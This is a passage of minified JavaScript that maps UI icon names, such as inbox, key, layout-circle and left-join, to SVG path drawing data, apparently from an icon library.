1.42l.3.29H4C1.79 2 0 3.79 0 6v3c0 .55.45 1 1 1s1-.45 1-1V6c0-1.1.9-2 2-2h1.59l-.3.29zM15.5 13c.83 0 1.5-.67 1.5-1.5s-.67-1.5-1.5-1.5-1.5.67-1.5 1.5.67 1.5 1.5 1.5zM19 7H6c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V8c0-.55-.45-1-1-1zm-1 10l-5-3-1 2-2-4-3 4.5V9h11v8z"],import:["M9.29 15.71c.18.18.43.29.71.29s.53-.11.71-.29l5-5a1.003 1.003 0 0 0-1.42-1.42L11 12.59V1c0-.55-.45-1-1-1S9 .45 9 1v11.59l-3.29-3.3a1.003 1.003 0 0 0-1.42 1.42l5 5zM19 14c-.55 0-1 .45-1 1v3H2v-3c0-.55-.45-1-1-1s-1 .45-1 1v4c0 .55.45 1 1 1h18c.55 0 1-.45 1-1v-4c0-.55-.45-1-1-1z"],inbox:["M16.92 3.56l-.01-.02c-.16-.35-.5-.6-.91-.6H4c-.41 0-.76.25-.91.6l-.01.02L0 10.49v6.46c0 .55.45 1 1 1h18c.55 0 1-.45 1-1v-6.46l-3.08-6.93zM15 10.95c-.55 0-1 .45-1 1v1H6v-1c0-.55-.45-1-1-1H1.98l2.67-6h10.7l2.67 6H15z"],"inbox-filtered":["M10.262 3l1.958 1.958v.05H4.65l-2.67 5.997H5c.55 0 1 .45 1 .999v1h8v-1c0-.55.45-1 1-1h3.02l-.635-1.426.625-.63c.354-.353.598-.8.707-1.289L20 10.545v6.456c0 .55-.45.999-1 .999H1c-.55 0-1-.45-1-1v-6.455L3.08 3.62l.01-.02c.15-.35.5-.6.91-.6h6.262zm9.088-3a.642.642 0 1 1 .46 1.1l-3.03 3.03v2.95c0 .18-.07.34-.19.46l-1.28 1.29c-.11.1-.27.17-.45.17-.35 0-.64-.29-.64-.64V4.13L11.19 1.1a.642.642 0 0 1 .45-1.1h7.71z"],"inbox-geo":["M7.427 3a7.467 7.467 0 0 0-.411 2.009H4.65l-2.67 5.996H5c.55 0 1 .45 1 .999v1h8V13c.165.01.332 0 .5 0a7.48 7.48 0 0 0 5.5-2.4V17c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1v-6.455L3.08 3.62l.01-.02c.15-.35.5-.6.91-.6h3.427zm5.715-.596a.133.133 0 0 1-.193 0l-.374-.374a.133.133 0 0 1 0-.193.133.133 0 0 1 .193 0l.373.374a.133.133 0 0 1 0 .193zm1.743.033c-.05 0-.088-.006-.088-.055 0-.05.038-.056.088-.056h.165c.05 0 .088.006.088.055 0 .05-.038.056-.088.056h-.165zm.539.632c-.05 0-.104-.044-.104-.094v-.23c0-.05.054-.094.104-.094.05 0 .104.044.104.094v.23c0 .05-.055.094-.104.094zm-3.575 2.304h.506l1.182 1.2c.006.005 0 .005 0 .01v.446c0 .187-.126.341-.319.341h-.098v.226c0 .192-.138.296-.33.296h.01v.792c0 .188-.181.336-.368.336s-.369-.149-.369-.335v-1.32h-.214c-.193 0-.308-.149-.308-.341V5.72c0-.192.115-.346.308-.346zM14.5 0C17.536 0 20 2.464 20 5.5S17.536 11 14.5 11A5.502 5.502 0 0 1 9 5.5C9 2.464 11.464 0 14.5 0zm0 9.9c2.431 0 4.4-1.969 4.4-4.4 0-.297-.027-.583-.099-.864h-.236c-.188 0-.336-.104-.347-.313h-.319c.11.104.231.209.231.346v.705c0 .088-.055.17-.11.23h-.022l-.011.006-.022.011-.666.643v1.21c0 .193-.104.33-.296.33h-.54c-.192 0-.319-.137-.319-.33V6.221a.915.915 0 0 0-.533-.518h-.671c-.192 0-.368-.143-.368-.335V4.68c0-.192.176-.346.368-.346l.193-.005.319-.32a.342.342 0 0 1 .489 0l.319.32c.005 0 .005.005.005.005h.704c.16 0 .237-.16.341-.313v-.11l-.038.005h-.27a.159.159 0 0 1-.153-.16c0-.087.066-.159.154-.159h.269l.039.006V3.42s-.05-.038-.061-.038h-.302l-.067.076a.342.342 0 0 1-.489.011l-.066-.088h-.176l.248.259c.021.022.021.088 0 .11-.028.022-.067.028-.088.006l-.292-.276h-.127l-.363.325-.033-.006c-.038.11-.087.089-.143.089-.126 0-.225-.072-.225-.193 0-.127.099-.209.225-.209h.176v-.182c0-.088.061-.131.149-.131h.066v-.127c0-.143.149-.297.286-.297h.28c.16 0 .27-.115.27-.275V2.42c0-.016.055.017.055-.088h-.187l-.005.017-.308.33a.123.123 0 0 1-.177 0c-.049-.044-.049-.121 0-.171l.391-.385c.027-.022.06-.022.094-.022l.005.022h.869A4.376 4.376 0 0 0 14.5 1.1a4.402 4.402 0 0 0-2.816 1.018h.583c.094 0 .165.066.165.159s-.072.16-.165.16h-.478c0 .104-.039.06-.039.066v.351h.429l.226-.252c.132-.127.346-.155.473-.022a.332.332 0 0 1 0 .473l-1.183 1.182-.011.011c-.005.005-.011.005-.016.011a.115.115 0 0 0-.034.022c-.005.006-.01 0-.016.006a.309.309 0 0 1-.176.038h-.347c-.12.104-.187.148-.187.27v.088c0 .016-.027.027-.027.043l.561.589c.06.06.055.154 0 .209a.143.143 0 0 1-.209 0l-.578-.578a.425.425 0 0 1-.082.011c-.154 0-.292-.12-.292-.274v-.358h-.016c-.104.374-.165.77-.165 1.177 0 2.431 1.969 4.4 4.4 4.4zm3.388-3.107c.077 0 .16.06.16.137v.424c0 .077-.083.137-.16.137s-.16-.06-.16-.137V6.93c0-.077.083-.137.16-.137zm-3.113-4.879c0 .187-.154.314-.335.314h-.374v.104c0 .11-.05.198-.16.198s-.16-.088-.16-.198V1.98c-.104-.022-.033-.028-.033-.055 0-.187.127-.325.314-.325h.407c.187 0 .341.127.341.314z"],"inbox-search":["M7.136 3a6.327 6.327 0 0 0-.098 2.009H4.65l-2.67 5.996H5c.55 0 1 .45 1 .999v1h8v-1c0-.55.45-1 1-1h1.076l1.14 1.14a2.767 2.767 0 0 0 1.974.806c.282 0 .554-.042.81-.12V17c0 .55-.45 1-1 1H1c-.55 0-1-.45-1-1v-6.455L3.08 3.62l.01-.02c.15-.35.5-.6.91-.6h3.136zm3.244 1.33c0 1.62 1.31 2.93 2.93 2.93s2.93-1.31 2.93-2.93-1.31-2.93-2.93-2.93-2.93 1.31-2.93 2.93zm6.47 2.43l2.89 2.85c.13.15.22.35.23.56 0 .43-.35.78-.78.78-.23 0-.42-.08-.56-.22l-2.87-2.87c-.17.1-.33.2-.51.29-.03.01-.06.03-.09.04-.18.07-.35.15-.55.21-.19.06-.37.11-.57.14-.05.01-.1.02-.14.02-.2.03-.39.05-.6.05A4.3 4.3 0 0 1 9 4.31C9 1.93 10.93.01 13.3 0c2.37 0 4.3 1.93 4.3 4.3 0 .21-.02.4-.05.6-.01.05-.01.09-.02.14-.04.2-.08.38-.14.58-.05.19-.13.36-.21.54-.01.03-.03.06-.04.09-.08.18-.18.34-.29.51z"],"inbox-update":["M10.083 3a6.04 6.04 0 0 0 .001 2.009H4.65l-2.67 5.996H5c.55 0 1 .45 1 .999v1h8v-1c0-.55.45-1 1-1h3.02l-.53-1.19a5.97 5.97 0 0 0 1.824-.811L20 10.545v6.456c0 .55-.45.999-1 .999H1c-.55 0-1-.45-1-1v-6.455L3.08 3.62l.01-.02c.15-.35.5-.6.91-.6h6.083zM16 8a4 4 0 1 1 0-8 4 4 0 0 1 0 8z"],"info-sign":["M10 0C4.48 0 0 4.48 0 10s4.48 10 10 10 10-4.48 10-10S15.52 0 10 0zM9 4h2v2H9V4zm4 12H7v-1h2V8H8V7h3v8h2v1z"],inheritance:["M6 10c0 2.21 1.79 4 4 4h6.59l-2.29-2.29A.965.965 0 0 1 14 11a1.003 1.003 0 0 1 1.71-.71l4 4c.18.18.29.43.29.71 0 .28-.11.53-.29.71l-4 4a1.003 1.003 0 0 1-1.42-1.42l2.3-2.29H10c-3.31 0-6-2.69-6-6H1a1 1 0 0 1-1-1V1a1 1 0 0 1 1-1h8a1 1 0 0 1 1 1v8a1 1 0 0 1-1 1H6zM2 2v6h6V2H2z"],"inner-join":["M8.7 4.7C7.4 6 6.5 7.9 6.5 10s.8 4 2.2 5.3c-.8.5-1.7.7-2.7.7-3.3 0-6-2.7-6-6s2.7-6 6-6c1 0 1.9.2 2.7.7zm-3.34 9.25c-.55-1.2-.86-2.54-.86-3.95s.31-2.75.86-3.95a4.001 4.001 0 0 0 0 7.9zM14 4c3.3 0 6 2.7 6 6s-2.7 6-6 6c-1 0-1.9-.2-2.7-.7 1.3-1.3 2.2-3.2 2.2-5.3s-.8-3.9-2.2-5.3C12.1 4.2 13 4 14 4zm.6 2.05c.55 1.2.86 2.54.86 3.95s-.31 2.75-.86 3.95c1.9-.31 3.36-1.96 3.36-3.95S16.5 6.36 14.6 6.05zM10 5.5C8.8 6.7 8 8.2 8 10s.8 3.3 2 4.4c1.2-1.1 2-2.7 2-4.5s-.8-3.3-2-4.4z"],insert:["M19 0H1C.4 0 0 .4 0 1v18c0 .5.4 1 1 1h18c.5 0 1-.5 1-1V1c0-.6-.5-1-1-1zm-1 18H2V2h16v16zM5 11h4v4c0 .6.4 1 1 1s1-.4 1-1v-4h4c.6 0 1-.4 1-1s-.4-1-1-1h-4V5c0-.6-.4-1-1-1s-1 .4-1 1v4H5c-.6 0-1 .4-1 1s.4 1 1 1z"],intersection:["M13 4c-1.31 0-2.51.43-3.5 1.14A5.977 5.977 0 0 0 6 4c-3.31 0-6 2.69-6 6s2.69 6 6 6c1.31 0 2.51-.43 3.5-1.14.99.71 2.19 1.14 3.5 1.14 3.31 0 6-2.69 6-6s-2.69-6-6-6zm-4.93 9.41c-.61.37-1.31.59-2.07.59-2.21 0-4-1.79-4-4s1.79-4 4-4c.76 0 1.46.22 2.07.59C7.4 7.56 7 8.73 7 10s.4 2.44 1.07 3.41zM13 14c-.76 0-1.46-.22-2.07-.59C11.6 12.44 12 11.27 12 10s-.4-2.44-1.07-3.41C11.54 6.22 12.24 6 13 6c2.21 0 4 1.79 4 4s-1.79 4-4 4z"],"ip-address":["M6 3.66C6 5.69 10 11 10 11s4-5.31 4-7.34C13.99 1.64 12.21 0 10 0S6 1.64 6 3.66zM8 4c0-1.1.9-2 2-2s2 .9 2 2-.9 2-2 2-2-.9-2-2zM14 13.5V13h-4v1h3v2h-2v1h3v-3.5zM3 12h14c.55 0 1 .45 1 1v6c0 .55-.45 1-1 1H3c-.55 0-1-.45-1-1v-6c0-.55.45-1 1-1zm4 1v6h1v-6H7zm3 1v5h1v-5h-1z"],issue:["M10 20C4.477 20 0 15.523 0 10S4.477 0 10 0s10 4.477 10 10-4.477 10-10 10zm0-2a8 8 0 1 0 0-16 8 8 0 0 0 0 16zm1-2H9v-2h2v2zm0-3H9V4h2v9z"],"issue-closed":["M15.364 5.9a.997.997 0 0 1-.707-.293l-2.121-2.122a1 1 0 1 1 1.414-1.414l1.414 1.414L18.192.657a1 1 0 0 1 1.414 1.414l-3.535 3.536a.997.997 0 0 1-.707.292zM11.78.157a3.002 3.002 0 0 0-1.437 1.85 8 8 0 1 0 7.1 5.055l.042-.042 1.472-1.472A9.959 9.959 0 0 1 20 10c0 5.523-4.477 10-10 10S0 15.523 0 10 4.477 0 10 0c.608 0 1.202.054 1.78.158zM11 16H9v-2h2v2zm0-3H9V4h2v9z"],"issue-new":["M13.167.512a2.98 2.98 0 0 0-.131.524c-.74.115-1.39.5-1.848 1.052a8 8 0 1 0 6.724 6.724 2.997 2.997 0 0 0 1.052-1.848 2.98 2.98 0 0 0 .524-.13A9.99 9.99 0 0 1 20 10c0 5.523-4.477 10-10 10S0 15.523 0 10 4.477 0 10 0a9.99 9.99 0 0 1 3.167.512zM11 16H9v-2h2v2zm0-3H9V4h2v9zm6-10h1.5a1 1 0 0 1 0 2H17v1.5a1 1 0 0 1-2 0V5h-1.5a1 1 0 0 1 0-2H15V1.5a1 1 0 0 1 2 0V3z"],italic:["M11.7 4H14c.6 0 1-.4 1-1s-.4-1-1-1H7c-.6 0-1 .4-1 1s.4 1 1 1h2.2L7.3 15H5c-.6 0-1 .4-1 1s.4 1 1 1h7c.6 0 1-.4 1-1s-.4-1-1-1H9.8l1.9-11z"],"join-table":["M19 6h-4V2c0-.55-.45-1-1-1H1c-.55 0-1 .45-1 1v11c0 .55.45 1 1 1h4v4c0 .55.45 1 1 1h13c.55 0 1-.45 1-1V7c0-.55-.45-1-1-1zM6 12H2V9h4v3zm0-4H2V5h4v3zm7 9H7v-3h6v3zm0-4H7V9h6v4zm0-5H7V5h6v3zm5 9h-4v-3h4v3zm0-4h-4v-3h4v3z"],key:["M14 0c-3.31 0-6 2.69-6 6 0 1.11.32 2.14.85 3.03L.44 17.44a1.498 1.498 0 1 0 2.12 2.12l.79-.79.94.94c.18.18.43.29.71.29s.53-.11.71-.29l3-3c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71l-.94-.94 3.2-3.2A5.9 5.9 0 0 0 14 12c3.31 0 6-2.69 6-6s-2.69-6-6-6zm0 9c-1.66 0-3-1.34-3-3s1.34-3 3-3 3 1.34 3 3-1.34 3-3 3z"],"key-backspace":["M19 3H7c-.28 0-.53.11-.71.29l-6 6C.11 9.47 0 9.72 0 10c0 .28.11.53.29.71l6 6c.18.18.43.29.71.29h12c.55 0 1-.45 1-1V4c0-.55-.45-1-1-1zm-2.29 9.29a1.003 1.003 0 0 1-1.42 1.42L13 11.41l-2.29 2.29c-.18.19-.43.3-.71.3a1.003 1.003 0 0 1-.71-1.71l2.3-2.29-2.3-2.29a1.003 1.003 0 0 1 1.42-1.42L13 8.59l2.29-2.29c.18-.19.43-.3.71-.3a1.003 1.003 0 0 1 .71 1.71L14.41 10l2.3 2.29z"],"key-command":["M15.5 12H14V8h1.5C17.43 8 19 6.43 19 4.5S17.43 1 15.5 1 12 2.57 12 4.5V6H8V4.5C8 2.57 6.43 1 4.5 1S1 2.57 1 4.5 2.57 8 4.5 8H6v4H4.5C2.57 12 1 13.57 1 15.5S2.57 19 4.5 19 8 17.43 8 15.5V14h4v1.5c0 1.93 1.57 3.5 3.5 3.5s3.5-1.57 3.5-3.5-1.57-3.5-3.5-3.5zm0-9c.83 0 1.5.67 1.5 1.5S16.33 6 15.5 6 14 5.33 14 4.5 14.67 3 15.5 3zm-11 14c-.83 0-1.5-.67-1.5-1.5S3.67 14 4.5 14s1.5.67 1.5 1.5S5.33 17 4.5 17zm0-11C3.67 6 3 5.33 3 4.5S3.67 3 4.5 3 6 3.67 6 4.5 5.33 6 4.5 6zm7.5 6H8V8h4v4zm3.5 5c-.83 0-1.5-.67-1.5-1.5s.67-1.5 1.5-1.5 1.5.67 1.5 1.5-.67 1.5-1.5 1.5z"],"key-control":["M16.71 7.29l-6-6C10.53 1.11 10.28 1 10 1s-.53.11-.71.29l-6 6a1.003 1.003 0 0 0 1.42 1.42L10 3.41l5.29 5.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71z"],"key-delete":["M19.71 9.29l-6-6A.997.997 0 0 0 13 3H1c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h12c.28 0 .53-.11.71-.29l6-6c.18-.18.29-.43.29-.71 0-.28-.11-.53-.29-.71zm-9 3a1.003 1.003 0 0 1-1.42 1.42L7 11.41 4.71 13.7c-.18.19-.43.3-.71.3a1.003 1.003 0 0 1-.71-1.71L5.59 10l-2.3-2.29a1.003 1.003 0 0 1 1.42-1.42L7 8.59 9.29 6.3c.18-.19.43-.3.71-.3a1.003 1.003 0 0 1 .71 1.71L8.41 10l2.3 2.29z"],"key-enter":["M18 2c-.55 0-1 .45-1 1v5c0 2.21-1.79 4-4 4H4.41L6.7 9.71c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71l-4 4c-.18.18-.29.43-.29.71 0 .28.11.53.29.71l4 4a1.003 1.003 0 0 0 1.42-1.42L4.41 14H13c3.31 0 6-2.69 6-6V3c0-.55-.45-1-1-1z"],"key-escape":["M2 8c.55 0 1-.45 1-1V4.41l6.29 6.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L4.41 3H7c.55 0 1-.45 1-1s-.45-1-1-1H2c-.55 0-1 .45-1 1v5c0 .55.45 1 1 1zm9-6.94V3.1c3.39.49 6 3.38 6 6.9 0 3.87-3.13 7-7 7-3.52 0-6.41-2.61-6.9-6H1.06c.5 4.5 4.31 8 8.94 8a9 9 0 0 0 9-9c0-4.63-3.5-8.44-8-8.94z"],"key-option":["M13 4h6c.55 0 1-.45 1-1s-.45-1-1-1h-6c-.55 0-1 .45-1 1s.45 1 1 1zm6 12h-4.42L6.87 2.5l-.02.01A.977.977 0 0 0 6 2H1c-.55 0-1 .45-1 1s.45 1 1 1h4.42l7.71 13.5.01-.01c.18.3.49.51.86.51h5c.55 0 1-.45 1-1s-.45-1-1-1z"],"key-shift":["M17.74 10.35l-6.99-8.01-.01.01C10.56 2.14 10.3 2 10 2s-.56.14-.74.35l-.01-.01-7 8 .01.01A.95.95 0 0 0 2 11c0 .55.45 1 1 1h3v5c0 .55.45 1 1 1h6c.55 0 1-.45 1-1v-5h3c.55 0 1-.45 1-1 0-.25-.1-.48-.26-.65z"],"key-tab":["M19 13H4.41l2.29-2.29c.19-.18.3-.43.3-.71a1.003 1.003 0 0 0-1.71-.71L2 12.59V10c0-.55-.45-1-1-1s-1 .45-1 1v8c0 .55.45 1 1 1s1-.45 1-1v-2.59l3.29 3.29c.18.19.43.3.71.3a1.003 1.003 0 0 0 .71-1.71L4.41 15H19c.55 0 1-.45 1-1s-.45-1-1-1zm0-12c-.55 0-1 .45-1 1v2.59L14.71 1.3A.965.965 0 0 0 14 1a1.003 1.003 0 0 0-.71 1.71L15.59 5H1c-.55 0-1 .45-1 1s.45 1 1 1h14.59L13.3 9.29c-.19.18-.3.43-.3.71a1.003 1.003 0 0 0 1.71.71L18 7.41V10c0 .55.45 1 1 1s1-.45 1-1V2c0-.55-.45-1-1-1z"],"known-vehicle":["M19 4a.997.997 0 0 0-.707.293L14 8.586l-2.293-2.293a1 1 0 0 0-1.414 1.414l3 3a.997.997 0 0 0 1.414 0l5-5A1 1 0 0 0 19 4zm-2.048 7.291c.011.072.048.134.048.209a1.5 1.5 0 0 1-1.5 1.5c-.225 0-.433-.057-.624-.145-.279.085-.57.145-.876.145a2.99 2.99 0 0 1-2.121-.879l-3-3 .007-.007A3.027 3.027 0 0 1 8.184 8H4V7l1-3h10l.19.568 1.307-1.308c-.336-.356-.758-.658-1.165-.772 0 0-1.74-.488-5.332-.488s-5.332.488-5.332.488c-.67.188-1.424.864-1.674 1.502L2.99 4H3L2 7H1a1 1 0 0 0 0 2h.333l-.28.84L1 10v7.5a1.5 1.5 0 1 0 3 0V17h12v.5a1.5 1.5 0 0 0 3 0V10l-.19-.568-1.858 1.86zM4.5 13a1.5 1.5 0 1 1 0-3 1.5 1.5 0 0 1 0 3z"],label:["M3 12h14v-1H3v1zm11-9H1c-.55 0-1 .45-1 1v12c0 .55.45 1 1 1h18c.55 0 1-.45 1-1V9l-6-6zm4 12H2V5h11v3H3v1h10v1h5v5zm-4-6V5l4 4h-4z"],layer:["M19.5 9.1l-9-5c-.2-.1-.3-.1-.5-.1s-.3 0-.5.1l-9 5c-.3.2-.5.5-.5.9s.2.7.5.9l9 5c.2.1.3.1.5.1s.3 0 .5-.1l9-5c.3-.2.5-.5.5-.9s-.2-.7-.5-.9z"],layers:["M.5 6.9l9 5c.2.1.3.1.5.1s.3 0 .5-.1l9-5c.3-.2.5-.5.5-.9s-.2-.7-.5-.9l-9-5c-.2-.1-.3-.1-.5-.1s-.3 0-.5.1l-9 5c-.3.2-.5.5-.5.9s.2.7.5.9z","M19 9c-.2 0-.3 0-.5.1L10 13.9 1.5 9.1C1.3 9 1.2 9 1 9c-.6 0-1 .4-1 1 0 .4.2.7.5.9l9 5c.2.1.3.1.5.1s.3 0 .5-.1l9-5c.3-.2.5-.5.5-.9 0-.6-.4-1-1-1z","M19 13c-.2 0-.3 0-.5.1L10 17.9l-8.5-4.7c-.2-.2-.3-.2-.5-.2-.6 0-1 .4-1 1 0 .4.2.7.5.9l9 5c.2.1.3.1.5.1s.3 0 .5-.1l9-5c.3-.2.5-.5.5-.9 0-.6-.4-1-1-1z"],layout:["M18 6c-1.1 0-2 .9-2 2 0 .37.11.71.28 1.01l-2.27 2.27c-.3-.17-.64-.28-1.01-.28-.93 0-1.71.64-1.93 1.5H8.93c-.22-.86-1-1.5-1.93-1.5-.37 0-.71.11-1.01.28L3.72 9.01C3.89 8.71 4 8.37 4 8c0-.34-.09-.66-.24-.94l3.66-3.38c.31.2.68.32 1.08.32 1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2c0 .34.09.66.24.94L3.08 6.32C2.77 6.12 2.4 6 2 6 .9 6 0 6.9 0 8s.9 2 2 2c.37 0 .71-.11 1.01-.28l2.27 2.27c-.17.3-.28.64-.28 1.01s.11.71.28 1.01l-2.27 2.27C2.71 16.11 2.37 16 2 16c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2c0-.37-.11-.71-.28-1.01l2.27-2.27c.3.17.64.28 1.01.28.93 0 1.71-.64 1.93-1.5h2.14c.22.86 1 1.5 1.93 1.5 1.1 0 2-.9 2-2 0-.37-.11-.71-.28-1.01l2.27-2.27c.3.17.64.28 1.01.28 1.1 0 2-.9 2-2s-.9-2-2-2z"],"layout-auto":["M18 13c-.53 0-1.01.21-1.37.55L11.9 10.6c.06-.19.1-.39.1-.6s-.04-.41-.1-.6l4.72-2.95c.37.34.85.55 1.38.55 1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2c0 .21.04.41.1.6l-4.73 2.96c-.24-.23-.54-.4-.87-.48V3.93c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2S8 .9 8 2c0 .93.64 1.71 1.5 1.93v4.14c-.33.09-.63.26-.87.48L3.9 5.6c.06-.19.1-.39.1-.6 0-1.1-.9-2-2-2s-2 .9-2 2 .9 2 2 2c.53 0 1.01-.21 1.37-.55L8.1 9.4c-.06.19-.1.39-.1.6s.04.41.1.6l-4.72 2.95C3.01 13.21 2.53 13 2 13c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2c0-.21-.04-.41-.1-.6l4.73-2.96c.24.23.54.4.87.48v4.14C8.64 16.29 8 17.07 8 18c0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93v-4.14c.33-.09.63-.26.87-.48l4.73 2.96c-.06.18-.1.38-.1.59 0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2z"],"layout-balloon":["M18 16c-.14 0-.28.02-.42.05l-1.73-3.45c.69-.45 1.14-1.22 1.14-2.1s-.46-1.65-1.14-2.1l1.73-3.45c.14.03.28.05.42.05 1.1 0 2-.9 2-2s-.9-2-2-2-2 .9-2 2c0 .6.27 1.13.69 1.5l-1.77 3.54c-.14-.02-.28-.04-.42-.04a2.5 2.5 0 0 0-2.45 2h-4.1A2.5 2.5 0 0 0 5.5 8c-.14 0-.28.02-.42.04L3.31 4.5C3.73 4.13 4 3.6 4 3c0-1.1-.9-2-2-2s-2 .9-2 2 .9 2 2 2c.14 0 .28-.02.42-.05L4.14 8.4C3.46 8.85 3 9.62 3 10.5s.46 1.65 1.14 2.1l-1.73 3.45A1.84 1.84 0 0 0 2 16c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2c0-.6-.27-1.13-.69-1.5l1.77-3.54c.14.02.28.04.42.04a2.5 2.5 0 0 0 2.45-2h4.1a2.5 2.5 0 0 0 2.45 2c.14 0 .28-.02.42-.04l1.77 3.54c-.42.37-.69.9-.69 1.5 0 1.1.9 2 2 2s2-.9 2-2-.9-2-2-2z"],"layout-circle":["M18.3 8c-.2-.9-.6-1.7-1.1-2.5.2-.3.3-.7.3-1 0-1.1-.9-2-2-2-.4 0-.7.1-1 .3-.8-.5-1.6-.8-2.5-1.1-.1-1-1-1.7-2-1.7S8.2.8 8 1.7c-.9.3-1.7.6-2.5 1.1-.3-.2-.7-.3-1-.3-1.1 0-2 .9-2 2 0 .4.1.7.3 1-.5.8-.8 1.6-1.1 2.5C.8 8.2 0 9 0 10s.8 1.8 1.7 2c.2.9.6 1.7 1.1 2.5-.2.3-.3.7-.3 1 0 1.1.9 2 2 2 .4 0 .7-.1 1-.3.8.5 1.6.8 2.5 1.1.1 1 1 1.7 2 1.7s1.8-.8 2-1.7c.9-.2 1.7-.6 2.5-1.1.3.2.7.3 1 .3 1.1 0 2-.9 2-2 0-.4-.1-.7-.3-1 .5-.8.8-1.6 1.1-2.5 1-.1 1.7-1 1.7-2s-.8-1.8-1.7-2zm-1.8 5.8c-.3-.2-.6-.3-1-.3-1.1 0-2 .9-2 2 0 .4.1.7.3 1-.6.3-1.2.6-1.9.8-.3-.7-1-1.3-1.9-1.3-.8 0-1.6.5-1.9 1.3-.7-.2-1.3-.4-1.9-.8.2-.3.3-.6.3-1 0-1.1-.9-2-2-2-.4 0-.7.1-1 .3-.3-.6-.6-1.2-.8-1.9.8-.3 1.3-1.1 1.3-1.9s-.5-1.6-1.2-1.8c.2-.7.4-1.3.8-1.9.3.2.6.3 1 .3 1.1 0 2-.9 2-2 0-.4-.1-.7-.3-1 .6-.3 1.2-.6 1.9-.8.2.7 1 1.2 1.8 1.2s1.6-.5 1.9-1.3c.7.2 1.3.4 1.9.8-.2.3-.3.6-.3 1 0 1.1.9 2 2 2 .4 0 .7-.1 1-.3.3.6.6 1.2.8 1.9-.8.3-1.3 1.1-1.3 1.9s.5 1.6 1.2 1.8c-.1.7-.4 1.4-.7 2z"],"layout-grid":["M2 0a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM10 0a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 0a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 8a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 16a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM10 16a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM2 16a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM2 8a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM10 8a2 2 0 1 0 0 4 2 2 0 1 0 0-4z"],"layout-group-by":["M2 2a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 0a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 8a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 16a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM2 14a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM2 8a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM13 12a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM13 4a2 2 0 1 0 0 4 2 2 0 1 0 0-4z"],"layout-hierarchy":["M18.5 16.07v-4.14c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2-.93 0-1.71.64-1.93 1.5h-4.14c-.18-.7-.73-1.25-1.43-1.43V3.93c.86-.22 1.5-1 1.5-1.93 0-1.1-.9-2-2-2S8 .9 8 2c0 .93.64 1.71 1.5 1.93v4.14c-.7.18-1.25.73-1.43 1.43H3.93C3.71 8.64 2.93 8 2 8c-1.1 0-2 .9-2 2 0 .93.64 1.71 1.5 1.93v4.14c-.86.22-1.5 1-1.5 1.93 0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93v-4.14c.7-.18 1.25-.73 1.43-1.43h4.14c.18.7.73 1.25 1.43 1.43v4.14c-.86.22-1.5 1-1.5 1.93 0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93v-4.14c.7-.18 1.25-.73 1.43-1.43h4.14c.18.7.73 1.25 1.43 1.43v4.14c-.86.22-1.5 1-1.5 1.93 0 1.1.9 2 2 2s2-.9 2-2c0-.93-.64-1.71-1.5-1.93z"],"layout-linear":["M16.5 7a2.5 2.5 0 0 0-2.45 2h-2.1a2.5 2.5 0 0 0-4.9 0h-2.1a2.5 2.5 0 1 0 0 1h2.1a2.5 2.5 0 0 0 4.9 0h2.1a2.5 2.5 0 1 0 2.45-3z"],"layout-skew-grid":["M2 0a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 0a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 8a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM18 16a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM2 16a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM2 8a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM10 12a2 2 0 1 0 0 4 2 2 0 1 0 0-4zM10 4a2 2 0 1 0 0 4 2 2 0 1 0 0-4z"],"layout-sorted-clusters":["M2 8c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0 8c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zM2 0C.9 0 0 .9 0 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm16 8c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm-8 4c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2zm0-8c-1.1 0-2 .9-2 2s.9 2 2 2 2-.9 2-2-.9-2-2-2z"],"left-join":["M8.7 4.7C7.4 6 6.5 7.9 6.5 10s.8 4 2.2 5.3c-.8.5-1.7.7-2.7.7-3.3 0-6-2.7-6-6s2.7-6 6-6c1 0 1.9.2 2.7.7zM14 4c3.3 0 6 2.7 6 6s-2.7 6-6 6c-1 0-1.9-.2-2.7-.7 1.3-1.3 2.2-3.2 2.2-5.3s-.8-3.9-2.2-5.3C12.1 4.2 13 4 14 4zm.6 2.05c.55 1.2.86 2.54.86 3.95s-.31 